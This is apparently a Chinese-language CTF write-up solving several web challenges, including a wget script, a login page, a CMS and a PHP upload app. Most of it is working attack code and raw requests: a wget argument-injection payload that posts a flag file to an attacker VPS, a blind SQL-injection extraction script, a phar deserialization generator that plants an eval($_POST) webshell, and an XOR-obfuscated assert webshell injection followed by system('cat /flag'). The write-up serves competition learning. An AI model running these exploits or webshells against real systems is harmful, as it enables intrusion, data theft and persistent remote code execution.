magic_download
run.sh
#!/bin/bash
# Challenge wrapper (magic_download): reads one line from stdin, checks that
# it "looks like an IP" and hands it to a bundled wget. The validation and the
# unquoted expansion below are the two weak points the write-up exploits.
ulimit -c 0 # no core dumps
ulimit -t 60 # CPU time limit (seconds)
ulimit -u 1500 # max number of processes
ulimit -m 512000 # max resident memory (kb)

cd /home/ctf
stdbuf -oL echo -n "Please enter your IP:"
# No -r: read processes backslash escapes, so a doubled backslash in the
# input ("\\n") arrives in $IP as a single "\n".
read IP
# Line-based check: grep exits 0 if ANY line of `echo $IP` matches, so the
# whole value is accepted as soon as one line looks like an IP. The page's
# payload ends in "\\n127.0.0.1"; bash's builtin echo does not expand "\n"
# unless xpg_echo/-e is in effect, so presumably the deployed echo does --
# TODO confirm. The pattern only bounds length and charset, it does not
# check IPv4 shape.
echo $IP|grep "^[0-9\.]\{7,15\}$" > /dev/null
if [ $? -ne 0 ]
then
 stdbuf -oL echo "Please input a IP!"
else
 # Unquoted $IP: every whitespace-separated word becomes a separate wget
 # argument, so the "IP" can smuggle options such as -e http_proxy=... or
 # --body-file=/home/ctf/flag. A safe version would pass "$IP" after "--".
 exec /home/ctf/wget -P /tmp $IP
fi
这个正则可以被换行绕过:grep 是逐行匹配的,只要 `echo $IP` 输出的任意一行满足 `^[0-9\.]\{7,15\}$`,检查就通过;而后面 `exec /home/ctf/wget -P /tmp $IP` 里的 `$IP` 没有加引号,会被按空白切成多个参数原样传给 wget。请看演示:
然后就是利用 wget
的各种参数,把 flag 给传出去。wget 可以用 `-e http_proxy=<vps>` 指定 HTTP 代理,整个请求会先发到代理;于是用 `--method=POST --body-file=/home/ctf/flag` 把 flag 放进请求体,把代理指向攻击者的 VPS,再在 VPS 的 80 端口监听,就能收到带着 flag 的请求。
1-e http_proxy=vps --method=POST --body-file=/home/ctf/flag --header=X-Powered-By:Y1ng \\n127.0.0.1
easyci
登录接口的 username 参数存在 SQL 注入(布尔盲注:注入条件为真时响应里不再出现「用户名」字样),当前数据库账号能用 load_file() 读文件,读 Apache 站点配置文件 `/etc/apache2/sites-enabled/000-default.conf` 就能得到网站根目录(DocumentRoot)。
1#!/usr/bin/env python3
2#-*- coding:utf-8 -*-
3#__author__: 颖奇L'Amore www.gem-love.com
4
5import requests
6import time
7from urllib.parse import quote
8from base64 import b64decode
9
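url = "http://your_docker.cloudeci1.ichunqiu.com/public/index.php/home/login"
data = {"username" : "", "password" : "y1ng"}
result = ""

# Earlier probes from the same session, kept for reference:
#   'select database()'
#   'password'  -> c3762483bc73d0b7943156d43911ce38
# Current target: the Apache vhost file, base64'd so the bisection only has
# to deal with the printable charset. Decoded it yields the DocumentRoot
# (/var/sercet/html); from there sqlmap --os-shell finishes the job.
payload = 'select to_base64(substr((load_file("/etc/apache2/sites-enabled/000-default.conf")),596,650))'

# Search window: printable ASCII. Landing on either boundary means the probed
# position is past the end of the string (ascii('') is 0, never > threshold).
LOW, HIGH = 32, 128
DELAY = 0.06  # pause between characters so the target stays responsive


def char_gt(pos, threshold):
    """Boolean-blind oracle: True iff ascii(substr(payload, pos, 1)) > threshold.

    The login page prints "用户名" on the failure path; its absence is the
    'true' signal. ``data`` is reused on purpose (password stays constant).
    """
    data["username"] = "0'or (ascii(substr((%s),%d,1)))>%d#" % (payload, pos, threshold)
    r = requests.post(url, data, timeout=10)
    return "用户名" not in r.text


def find_char(pos):
    """Bisect the code point of character ``pos`` (1-based) of ``payload``.

    Invariant: the answer is in [low, high); ``low`` is returned once the
    window collapses (original code read the same value from ``mid``).
    """
    low, high = LOW, HIGH
    while low < high:
        mid = (low + high) // 2
        if char_gt(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


for i in range(1, 10000):
    time.sleep(DELAY)
    code = find_char(i)
    if code in (LOW, HIGH - 1):
        break  # end of string
    result += chr(code)
    print(result)
    # The base64 is still growing, so decoding usually fails on padding
    # (binascii.Error) or on a torn multibyte sequence (UnicodeDecodeError);
    # both are ValueError subclasses and are only progress noise.
    try:
        print(b64decode(result.encode()).decode())
    except ValueError:
        pass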
根目录是 /var/sercet/html,然后用 sqlmap 的 `--os-shell`(借同一个注入点把 stager 写到这个目录)一把梭就完了。
easycms
www.zip 拿到源码,config.php 里拿到数据库账号密码 admin/admin868;后台口令与数据库口令复用,用同一组凭据也进了后台。
然后利用 yzmcms 后台已公开的这个 SSRF 漏洞读取本地文件 /flag 即可:https://github.com/yzmcms/yzmcms/issues/53
hello php
www.zip 拿到源码,是一个简单的 phar 反序列化:把一个 `Config` 对象放进 phar 的 metadata,其 title 字段带上 PHP 代码,反序列化后会被写进 config.php。生成 phar 的脚本(需用 `php -d phar.readonly=0` 运行):
1<?php
/**
 * Local mirror of the target application's Config class.
 *
 * Only the class name and the three public properties matter: they must
 * match what the target unserializes so the phar metadata rehydrates into
 * an object the application accepts. Presumably the target later writes
 * these properties into config.php, which is where the payload lands.
 */
class Config{
    /** @var string carries the PHP payload */
    public $title;
    /** @var string */
    public $comment;
    /** @var string */
    public $logo_url;

    /**
     * @param string $title
     * @param string $comment
     * @param string $logo_url
     */
    public function __construct($title,$comment,$logo_url){
        $this->logo_url = $logo_url;
        $this->comment = $comment;
        $this->title = $title;
    }
}
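// Payload: the leading "'" closes the string literal the target writes title
// into, then a one-liner webshell follows; the trailing "//" comments out
// whatever the target appends after it.
$c = new Config("';echo('shell');eval(\$_POST['0']);//",'123','123');

// Phar archives can only be written when phar.readonly is off; fail loudly
// up front instead of letting new Phar()/setMetadata throw later.
if (filter_var(ini_get('phar.readonly'), FILTER_VALIDATE_BOOLEAN)) {
    fwrite(STDERR, "phar.readonly is on: run as  php -d phar.readonly=0 " . basename(__FILE__) . "\n");
    exit(1);
}

// Start from a clean slate; opening an existing phar.phar would reuse it.
@unlink("phar.jpg");
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
// Minimal stub; the .jpg extension only has to satisfy the upload side,
// phar:// itself does not care about the extension.
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($c); // metadata is what unserialize() rebuilds on the target
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
if (!rename("phar.phar", "phar.jpg")) {
    fwrite(STDERR, "rename phar.phar -> phar.jpg failed\n");
    exit(1);
}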
21?>
上传后的文件名是上传时刻 Unix 时间戳(秒)的 md5,而且没有回显,所以上传后马上跑个脚本按秒枚举来找:
1#!/usr/bin/env python3
2#-*- coding:utf-8 -*-
3import time
4import requests as req
5import hashlib
def md5(s):
    """Hex MD5 digest of ``s`` encoded as UTF-8 (the ``str.encode`` default)."""
    digest = hashlib.md5()
    digest.update(s.encode())
    return digest.hexdigest()
8
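# The upload handler names the file md5(<unix seconds at upload time>).jpg
# and does not echo the name back, so the name is recoverable by hashing
# candidate timestamps. The original only hashed the *current* second on
# each pass, which misses the file if the upload finished even one second
# before this script started; probe a window of recent seconds instead.
BASE = "http://eci-2zeb3stdvqw9aed67js3.cloudeci1.ichunqiu.com/static/"
WINDOW = 30  # seconds to look back from "now"; widen if the upload was earlier

tried = set()
found = None
for i in range(100):
    now = int(time.time())
    # Newest first (most likely); later passes only add the new current second.
    for ts in range(now, now - WINDOW, -1):
        if ts in tried:
            continue
        tried.add(ts)
        url = f"{BASE}{md5(str(ts))}.jpg"
        r = req.get(url, timeout=10)
        if r.status_code == 200:
            found = url
            break
        print(i, ts, r.status_code)
    if found:
        print(found)
        break
    time.sleep(1)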
index.php 的 img 参数接受 `phar://` 路径,文件操作时会反序列化 phar 的 metadata,从而把马写入 config.php:
1/?img=phar:///var/www/html/static/67d9c71da5d4926c0f3433659c0690fd.jpg
大家一起来审代码
参考 https://www.freebuf.com/vuls/241106.html
用 admin/123456 进入后台。adm1n/admin_weixin.php(action=set)会把表单内容写入 data/admin/weixin.php,写入时推测对字母数字有过滤,所以在 msg5b 里先闭合字符串,再用 XOR 拼出函数名和变量名:`('%01'^'`').('%13'^'`')…` 得到 `assert`,`'_'.('%0D'^']').('%2F'^'`')…` 得到 `_POST`,最终落地的等价于 `assert($_POST['_'])`。随后向 data/admin/weixin.php POST `_=system("cat /flag");` 即可。注意以字符串方式调用 assert 执行代码只在 PHP 7 及更早版本有效。
1POST /adm1n/admin_weixin.php?action=set HTTP/1.1
2Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6Accept-Encoding: gzip, deflate
7Content-Type: application/x-www-form-urlencoded
8Content-Length: 1265
9Connection: close
10Referer: http://eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com/adm1n/admin_weixin.php
11Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
12Upgrade-Insecure-Requests: 1
13isopen=n&url=https%3A%2F%2Fwww.seacms.net&title=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86&ckmov_url=https%3A%2F%2Fwww.seacms.net%2Fvip.php%3Furl%3D+&dpic=https%3A%2F%2Fwww.seacms.net%2Fapi%2Fwx.jpg&follow=%E6%84%9F%E8%B0%A2%E6%82%A8%E7%9A%84%E5%85%B3%E6%B3%A8%E3%80%82&noc=%E6%9A%82%E6%97%A0%E4%BD%A0%E8%A6%81%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82&help=%E8%BF%99%E6%98%AF%E5%B8%AE%E5%8A%A9%E4%BF%A1%E6%81%AF%E3%80%82&topage=d&dwz=n&dwztoken=dwztoken&sql_num=15&msg1a=%E5%85%B3%E9%94%AE%E8%AF%8D1&msg1b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B91&msg2a=%E5%85%B3%E9%94%AE%E8%AF%8D2&msg2b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B92%3Ca+href%3D%27http%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%E6%B5%8B%E8%AF%95%3C%2Fa%3E%EF%BC%8C%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9D%9F%E3%80%82&msg3a=%E5%85%B3%E9%94%AE%E8%AF%8D3&msg3b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B93&msg4a=%E5%85%B3%E9%94%AE%E8%AF%8D4&msg4b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B94&msg5a=%E5%85%B3%E9%94%AE%E8%AF%8D5&msg5b=1231");$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);//
1POST /data/admin/weixin.php HTTP/1.1
2Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6Accept-Encoding: gzip, deflate
7Connection: close
8Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
9Upgrade-Insecure-Requests: 1
10Cache-Control: max-age=0
11Content-Type: application/x-www-form-urlencoded
12Content-Length: 22
13_=system("cat /flag");